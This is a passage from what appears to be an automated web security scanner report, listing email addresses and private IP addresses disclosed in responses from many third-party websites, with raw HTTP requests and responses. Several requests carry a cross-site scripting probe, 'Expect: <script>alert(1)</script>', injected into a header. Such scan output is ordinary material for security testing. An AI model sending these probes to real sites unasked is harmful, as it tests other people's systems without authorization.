Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Sep 2010 18:47:39 GMT
ETag: "1ec4-4c93b7cb"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 7876

function showGlobalFooter(node) {
   //_gnpost.timesThrough = 1;
   //placeChannelNav(node);
   //commenting out new footer
   //document.write("<div style='width:970' id='footer'>");
   //document.write("
...[SNIP]...
<a href="mailto:ombudsman@washpost.com">
...[SNIP]...

27.43. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jqModal.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jqModal.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-adv/jobs4/javascript/jqModal.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Aug 2010 19:50:53 GMT
ETag: "1664-4c62ff1d"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:32:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:55 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5732

/* SCREEN FUNCTIONS */
/* these functions are to override the way jquery gets the height/width of the body of the page so that the jqModal windows will work in IE7 */
/* functions are from javascr
...[SNIP]...
<bhb@iceburg.net>
...[SNIP]...

27.44. http://www.xhost.ro/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xhost.ro
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xhost.ro
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:58:07 GMT
Server: Apache
Content-Length: 488
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:suport@xhost.ro">
...[SNIP]...

28. Private IP addresses disclosed
There are 20 instances of this issue:


28.1. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "54c234152c694596eeea7cc18ee6626b"
X-FB-Server: 10.32.104.129
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=177
Expires: Sun, 01 May 2011 23:36:08 GMT
Date: Sun, 01 May 2011 23:33:11 GMT
Connection: close
Content-Length: 18453

/*1303860379,169896065,JIT Construction: v371127,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

28.2. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/XdCommReceiver.js?2 HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.30.145.197
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: max-age=612242
Expires: Mon, 09 May 2011 01:38:46 GMT
Date: Sun, 01 May 2011 23:34:44 GMT
Connection: close
Content-Length: 3386

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...

28.3. http://www.bucadibeppo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bucadibeppo.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bucadibeppo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 584926432
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 00:06:14 GMT
Via: 1.1 varnish 172.17.34.80
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

28.4. http://www.cupcakesandcashmere.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cupcakesandcashmere.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cupcakesandcashmere.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 252453132
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sun, 01 May 2011 23:55:49 GMT
Via: 1.1 varnish 172.17.35.60
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

28.5. http://www.encomer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.encomer.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.encomer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1324502344
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sun, 01 May 2011 23:42:13 GMT
Via: 1.1 varnish 172.17.35.80
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

28.6. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.21.60
X-Cnection: close
Date: Sun, 01 May 2011 23:32:46 GMT
Content-Length: 0


28.7. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.41
X-Cnection: close
Date: Sun, 01 May 2011 23:33:41 GMT
Content-Length: 1235

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"washingtonpost.com","channe
...[SNIP]...

28.8. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.138.43
X-Cnection: close
Date: Sun, 01 May 2011 23:33:51 GMT
Content-Length: 0


28.9. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.142.59
X-Cnection: close
Date: Sun, 01 May 2011 23:32:35 GMT
Content-Length: 0


28.10. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.50
X-Cnection: close
Date: Sun, 01 May 2011 23:32:34 GMT
Content-Length: 8636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

28.11. http://www.gohawaii.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gohawaii.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gohawaii.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=XKQRVMS192.168.10.48CKMLW; path=/
Date: Sun, 01 May 2011 23:49:22 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 472
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

28.12. http://www.google.com/sdch/rU20-FBA.dct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F
If-Modified-Since: Sat, 30 Apr 2011 20:13:54 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Mon, 02 May 2011 00:49:42 GMT
Date: Mon, 02 May 2011 02:04:43 GMT
Expires: Mon, 02 May 2011 02:04:43 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...

28.13. http://www.homebusinessconnection.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homebusinessconnection.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homebusinessconnection.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 396950468
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sun, 01 May 2011 23:16:24 GMT
Via: 1.1 varnish 172.17.2.157
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

28.14. http://www.latinamericancupid.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latinamericancupid.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.latinamericancupid.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
NLBServer: 192.168.164.18;
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:11 GMT


28.15. http://www.mochigames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mochigames.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mochigames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 02 May 2011 00:50:28 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Wed, 18 Aug 2010 01:49:13 GMT
Connection: keep-alive
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.15:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.113:40043
X-Mochi-Source: 10.0.0.235:35658

............ .h.......(....... ..... ........................................................................................................gaaa.RRR.SSS.UUU.SSS.RRR.SSS.jjj....W....................ll
...[SNIP]...

28.16. http://www.nflgridirongab.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nflgridirongab.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nflgridirongab.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2136373459
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sun, 01 May 2011 23:45:08 GMT
Via: 1.1 varnish 172.17.2.192
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

28.17. http://www.onlocationvacations.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlocationvacations.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlocationvacations.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 325720725
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 00:52:41 GMT
Via: 1.1 varnish 172.17.34.106
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

28.18. http://www.searchcactus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchcactus.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchcactus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IMQQWQS10.10.10.2CKKIL; path=/
Server: Microsoft-IIS/5.0
Set-Cookie: serverid=scweb1
P3P: CP="IDC COR CUR OUR STP"
Date: Sun, 01 May 2011 23:26:39 GMT
Content-Type: image/x-icon
Accept-Ranges: bytes
